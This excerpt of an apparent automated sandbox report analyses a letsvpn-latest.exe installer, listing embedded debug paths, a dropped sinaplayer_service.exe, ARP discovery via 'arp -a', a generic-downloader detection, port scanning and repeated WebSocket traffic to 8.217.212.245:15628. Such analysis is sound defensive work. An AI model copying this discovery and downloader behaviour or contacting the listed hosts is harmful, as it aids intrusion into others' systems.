              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Expressions\4.1.2.0\System.Linq.Expressions.pdb source: letsvpn-latest.exe, 00000015.00000003.2436998881.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb source: letsvpn-latest.exe, 00000015.00000003.2477452531.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdb source: letsvpn-latest.exe, 00000015.00000003.2383763587.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: letsvpn-latest.exe, 00000015.00000003.2373633715.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2481329381.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdbX)r) d)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2452215583.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet\obj\Release\DeltaCompressionDotNet.pdb source: letsvpn-latest.exe, 00000015.00000003.2349256901.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: letsvpn-latest.exe, 00000015.00000003.2394947957.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdbT)n) `)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2493596023.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: letsvpn-latest.exe, 00000015.00000003.2368187744.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb<(V( H(_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2394362077.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: letsvpn-latest.exe, 00000015.00000003.2413088913.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2486911961.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2488820018.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: letsvpn-latest.exe, 00000015.00000003.2512523323.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdbSHA256,C+U7 source: letsvpn-latest.exe, 00000015.00000003.2476891907.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\SuperSocket.Clientuser\obj\Release\SuperSocket.Clientuser.pdbR source: letsvpn-latest.exe, 00000015.00000003.2393796689.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Queryable\4.0.1.0\System.Linq.Queryable.pdb source: letsvpn-latest.exe, 00000015.00000003.2438332844.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2380231891.0000000003105000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2711648046.0000000005742000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlDocument\4.0.3.0\System.Xml.XmlDocument.pdb source: letsvpn-latest.exe, 00000015.00000003.2508751976.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Thread\4.0.2.0\System.Threading.Thread.pdb source: letsvpn-latest.exe, 00000015.00000003.2496112419.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdb source: letsvpn-latest.exe, 00000015.00000003.2513494263.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdb source: letsvpn-latest.exe, 00000015.00000003.2395719645.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdb source: letsvpn-latest.exe, 00000015.00000003.2412144630.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdb source: letsvpn-latest.exe, 00000015.00000003.2448378119.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding\4.0.11.0\System.Text.Encoding.pdb source: letsvpn-latest.exe, 00000015.00000003.2490972504.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Claims\4.0.3.0\System.Security.Claims.pdb source: letsvpn-latest.exe, 00000015.00000003.2475844449.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb source: letsvpn-latest.exe, 00000015.00000003.2387449334.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.SqlClient/net461-Windows_NT-Release/System.Data.SqlClient.pdb source: letsvpn-latest.exe, 00000015.00000003.2407414987.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdb source: letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdb source: letsvpn-latest.exe, 00000015.00000003.2478524484.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensions\obj\Release\SQLiteNetExtensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2383107440.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: letsvpn-latest.exe, 00000015.00000003.2503243921.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Primitives\4.0.3.0\System.IO.FileSystem.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2428597566.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdbp( source: letsvpn-latest.exe, 00000015.00000003.2411480070.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: letsvpn-latest.exe, 00000015.00000003.2367415267.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 00000021.00000000.2603866703.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000021.00000002.2606131178.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000000.2607796952.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000002.2660016264.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000000.2665972836.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000002.2668002400.00007FF796191000.00000020.00000001.01000000.00000017.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdb source: letsvpn-latest.exe, 00000015.00000003.2452215583.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb]W source: letsvpn-latest.exe, 00000015.00000003.2426450844.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdb source: letsvpn-latest.exe, 00000015.00000003.2376355832.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Extensions\4.1.2.0\System.Runtime.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Net.Sockets/netfx\System.Net.Sockets.pdb source: letsvpn-latest.exe, 00000015.00000003.2453530539.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections\4.0.11.0\System.Collections.pdb source: letsvpn-latest.exe, 00000015.00000003.2398236397.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets\4.0.2.0\System.Net.WebSockets.pdb source: letsvpn-latest.exe, 00000015.00000003.2455726262.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2371393124.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb$.>. 0._CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2413846531.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: letsvpn-latest.exe, 00000015.00000003.2467599603.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.MemoryMappedFiles\4.0.2.0\System.IO.MemoryMappedFiles.pdb source: letsvpn-latest.exe, 00000015.00000003.2431492530.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization.Calendars\4.0.3.0\System.Globalization.Calendars.pdb source: letsvpn-latest.exe, 00000015.00000003.2423705270.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdb source: letsvpn-latest.exe, 00000015.00000003.2487551781.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdb source: letsvpn-latest.exe, 00000015.00000003.2410824087.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp

              Spreading

              barindex
              Performs a network lookup / discovery via ARP
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FEB97 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,__fstat64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,19_2_6D0FEB97
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FC41C _mbsdec,_mbscmp,_mbscmp,_strdup,strlen,_calloc_crt,__cftof,strcpy_s,_mbsicmp,_invoke_watson,_malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,19_2_6D0FC41C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FE748 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FindClose,_errno,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,19_2_6D0FE748
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FC385 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,19_2_6D0FC385
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D095C91 _wstat64i32,_wcspbrk,towlower,FindFirstFileExW,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,_getdrive,GetLastError,GetLastError,_wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,GetDriveTypeW,free,free,_wsopen_s,__fstat64i32,_close,_errno,__dosmaperr,FindClose,__dosmaperr,FindClose,19_2_6D095C91
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FDCF7 _wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FDCF7
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FDF35 _wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FDF35
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FD86F _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FD86F
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FDA9B _wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FDA9B
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,21_2_00405C4D
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_0040689E FindFirstFileW,FindClose,21_2_0040689E
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_00402930 FindFirstFileW,21_2_00402930
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF7961971EC GetWindowsDirectoryW,FindFirstFileW,__iob_func,__iob_func,__iob_func,FindNextFileW,FindClose,33_2_00007FF7961971EC
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00684318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor,58_2_00684318
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00695490 FindFirstFileExW,58_2_00695490

              Networking

              barindex
              Connects to many ports of the same IP (likely port scanning)
              Source: global trafficTCP traffic: 8.217.212.245 ports 1,2,15628,5,6,8
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 15628
              Yara detected Generic Downloader
              Source: Yara matchFile source: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll, type: DROPPED
              Source: Yara matchFile source: C:\Program Files (x86)\letsvpn\Update.exe, type: DROPPED
              Source: global trafficTCP traffic: 192.168.2.6:49730 -> 8.217.212.245:15628
              Source: global trafficTCP traffic: 192.168.2.6:49866 -> 8.8.8.8:53
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: EAIFCJJtIpBBrGEUCHJJUtCpESec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: hgEoGyIHHcKxHmeBCkGUPHIERSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: EHDtHuIBUdDVfHXhrVyFEUGzFSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: COcjDJHEDQoOInBCDDGFarHDUSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: qphGfKuJZRHBtITmGBcfpvVDUSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: UqeIpIqArHhSexIQlmFYlJBoGSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: DXBHDqPpLFlTgCIrHHBxEKHKPSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: hyKyGMDiwJKCSQjDasFQwJaKHSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1Host: ws-ap1.pusher.comUpgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: ZmQxOTJiYTctZGRlMS00Zg==Origin: ws://ws-ap1.pusher.com
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: WfxndBCwxGPkHVEIkfBOKFtISSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: CGuKfKJpiJIQgrIIGFFIHJHHJSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: yhrCHtBBGdQDZCyKHJjbdBnHKSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: FoPFDZlWHBTCtkBnNJIzYtBHVSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: BKUcFWzXCrUNNGuBHHCSIyZHKSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: oqRHpJDqHRNDHUVBBFHIccFjWSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: WwPxFgueJfqDBCQDPnCJYZTEBSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: KdIFBVttISDfKflFDZBItwEBsSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: iDHKdRHDOTuLoEMRwtCCiifOESec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: Joe Sandbox ViewIP Address: 183.60.146.66 183.60.146.66
              Source: Joe Sandbox ViewIP Address: 103.235.46.96 103.235.46.96
              Source: Joe Sandbox ViewIP Address: 103.235.46.96 103.235.46.96
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
